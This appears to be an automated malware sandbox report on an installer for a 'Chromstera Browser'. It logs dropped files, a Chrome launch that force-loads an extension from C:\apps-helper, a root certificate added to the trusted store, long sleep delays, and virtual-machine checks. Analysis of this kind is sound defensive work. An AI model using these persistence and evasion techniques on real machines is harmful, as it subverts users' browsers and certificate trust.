                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\Updater.pdb source: ChromsteraUpdater.exe, 00000008.00000000.1793999764.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbR source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbfi source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: setup.exe, Chromnius-Main.msi.0.dr
                      Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089q8 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \Sre.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89+&| source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: setup.exe
                      Source: Binary string: System.Management.Automation.pdblb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: setup.exe, MSICC66.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdblat* source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb[ source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd50a source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E313000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb) source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb'iM source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbtionmw source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wininet.pdbUGP source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: setup.exe, lzmaextractor.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.exe, MSI3193.tmp.0.dr, MSICBB9.tmp.1.dr, MSICA7D.tmp.1.dr, MSI331F.tmp.0.dr, MSI35E5.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: shi3105.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCF120 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,FreeLibrary,0_2_00CCF120
                      Source: shi3105.tmp.0.drStatic PE information: section name: .wpp_sf
                      Source: shi3105.tmp.0.drStatic PE information: section name: .didat
                      Source: MSI4739.tmp.1.drStatic PE information: section name: _RDATA
                      Source: MSIFB77.tmp.1.drStatic PE information: section name: _RDATA
                      Source: shiC6A3.tmp.3.drStatic PE information: section name: .wpp_sf
                      Source: shiC6A3.tmp.3.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BBB10B push esi; ret 0_2_00BBB10D
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CAB2C0 push ecx; mov dword ptr [esp], 3F800000h0_2_00CAB3F6
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BBD310 push ecx; mov dword ptr [esp], ecx0_2_00BBD311
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BCC63B push ds; ret 0_2_00BCC63F
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D8086C push ecx; ret 0_2_00D8087F
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BBB10B push esi; ret 3_2_00BBB10D
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00CAB2C0 push ecx; mov dword ptr [esp], 3F800000h3_2_00CAB3F6
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BBD310 push ecx; mov dword ptr [esp], ecx3_2_00BBD311
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BCC63B push ds; ret 3_2_00BCC63F
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D8086C push ecx; ret 3_2_00D8087F
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00167FC0 push ecx; ret 8_2_00167FD3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B4019BC pushad ; ret 14_2_00007FFD9B4019C9

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIFB77.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI4739.tmpJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\viewer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI331F.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shi3105.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA7D.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC26.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBB9.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI32EF.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\tempFiles.dllJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shiC6A3.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4739.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3193.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID11C.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID04F.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3290.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dllJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3517.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICB79.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3340.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICAEB.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3230.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI35A6.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC933.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3566.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC9EF.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI32CF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11D0.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI35E5.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3250.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3360.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB77.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSI34E7.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC66.tmpJump to dropped file
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Installer\MSI4739.tmp Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmp Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmp Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmp Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: 8_2_000F02B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4082
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4615
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6014
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2232
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1951
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI331F.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\viewer.exe
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi3105.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSICA7D.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIEC26.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSICBB9.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI32EF.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiC6A3.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3193.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSID11C.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSID04F.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3517.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3290.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSICB79.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSICAEB.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3340.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI35A6.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3230.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIC933.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3566.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIC9EF.tmp
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI11D0.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI32CF.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI35E5.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3250.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3360.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI34E7.tmp
                      Source: C:\Users\user\Desktop\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dll
                      Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSICC66.tmp
                      Source: C:\Windows\Installer\MSIFB77.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Installer\MSI4739.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Users\user\Desktop\setup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-45269
                      Source: C:\Users\user\Desktop\setup.exeAPI coverage: 5.7 %
                      Source: C:\Users\user\Desktop\setup.exeAPI coverage: 5.5 %
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeAPI coverage: 4.5 %
                      Source: C:\Windows\Installer\MSI4739.tmpAPI coverage: 5.1 %
                      Source: C:\Windows\Installer\MSIFB77.tmpAPI coverage: 4.3 %
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000F02B08_2_000F02B0
                      Source: C:\Users\user\Desktop\setup.exe TID: 7424Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 4082 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 4615 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 6014 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 2232 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep count: 5887 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 1951 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3468Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\timeout.exe TID: 2344Thread sleep count: 45 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCBDA0 FindFirstFileW,GetLastError,FindClose,0_2_00CCBDA0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC2290 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BC2290
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCB3A0 _wcsrchr,_wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,_wcsrchr,0_2_00CCB3A0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCB7D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCB7D0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000DEAA0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,8_2_000DEAA0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00184E5C FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00184E5C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7D0F2 VirtualQuery,GetSystemInfo,0_2_00D7D0F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: MSIFB77.tmp, 00000036.00000003.2838702310.000001567CDE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                      Source: setup.exe, 00000000.00000003.1717180600.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716043563.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2950970650.0000000003C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
